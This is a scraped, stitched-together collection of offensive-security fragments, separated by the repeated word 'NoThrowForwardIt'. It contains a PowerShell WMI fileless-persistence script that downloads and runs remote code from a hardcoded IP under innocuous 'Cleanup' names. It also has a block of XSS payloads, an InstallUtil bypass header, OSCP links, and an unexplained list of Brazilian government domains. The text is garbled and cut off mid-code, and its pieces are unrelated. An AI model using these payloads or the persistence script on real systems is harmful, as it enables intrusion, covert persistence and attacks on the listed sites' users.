NoThrowForwardIt

Domains:

 - dapyp.cmi.rj.gov.br
 - angra.rj.gov.br
 - arapoti.pr.gov.br
 - atos.campobom.rs.gov.br
 - belacruz.ce.gov.br
 - biblioteca.cofen.gov.br
 - camarabp.sp.gov.br
 - cimpolinorte.es.gov.br

NoThrowForwardIt

from oletools.olevba import VBA_Parser, TYPE_OLE, TYPE_OpenXML, TYPE_Word2003_XML, TYPE_MHTML
import sys
import re

vbaparser = VBA_Parser(sys.argv[1])

replace_regex = r"\s*([^=]+)\s*=\s*Replace\(\s*([^,]+)\s*,\s*\"([^,]*)\"\s*,\s*\"([^,]*)\"\s*\)"
replace = re.compile(replace_regex, re.MULTILINE)

regex_url = "http(s)?://[^,\"]+"

NoThrowForwardIt

"          _                      _          "
"   _     /||       .   .        ||\     _   "
"  ( }    \||D    '   '     '   C||/    { %  "
" | /\__,=_[_]   '  .   . '       [_]_=,__/\ |"
" |_\_  |----|                    |----|  _/_|"
" |  |/ |    |                    |    | \|  |"
" |  /_ |    |                    |    | _\  |"

	It is all fun and games until someone gets hacked!

NoThrowForwardIt

"          _                      _          "
"   _     /||       .   .        ||\     _   "
"  ( }    \||D    '   '     '   C||/    { %  "
" | /\__,=_[_]   '  .   . '       [_]_=,__/\ |"
" |_\_  |----|                    |----|  _/_|"
" |  |/ |    |                    |    | \|  |"
" |  /_ |    |                    |    | _\  |"

	It is all fun and games until someone gets hacked!

NoThrowForwardIt

"          _                      _          "
"   _     /||       .   .        ||\     _   "
"  ( }    \||D    '   '     '   C||/    { %  "
" | /\__,=_[_]   '  .   . '       [_]_=,__/\ |"
" |_\_  |----|                    |----|  _/_|"
" |  |/ |    |                    |    | \|  |"
" |  /_ |    |                    |    | _\  |"

	It is all fun and games until someone gets hacked!

NoThrowForwardIt

<#
Credits to @mattifestion for his awesome work on WMI and Powershell Fileless Persistence.  This script is an adaptation of his work.
#>

function Install-Persistence{

    $Payload = "((new-object net.webclient).downloadstring('http://172.16.134.129:80/a'))"
    $EventFilterName = 'Cleanup'
    $EventConsumerName = 'DataCleanup'
    $finalPayload = "powershell.exe -nop -c `"IEX $Payload`""

NoThrowForwardIt

24x7x365 SUPPORT http://www.captiongenerator.com/320492/Offsec-Student-Admins

https://natesubra.com/go/oscp

OSCP Syllabus:

https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/

Windows Privilege Escalation:

http://www.fuzzysecurity.com/tutorials/16.html https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/

NoThrowForwardIt

Windows Toolkit

Binary

Native Binaries

• IDA Pro

IDA Plugins	Preferred	Neutral	Unreviewed

NoThrowForwardIt

using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
 
  
/*
Author: Casey Smith, Twitter: @subTee

NoThrowForwardIt

<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>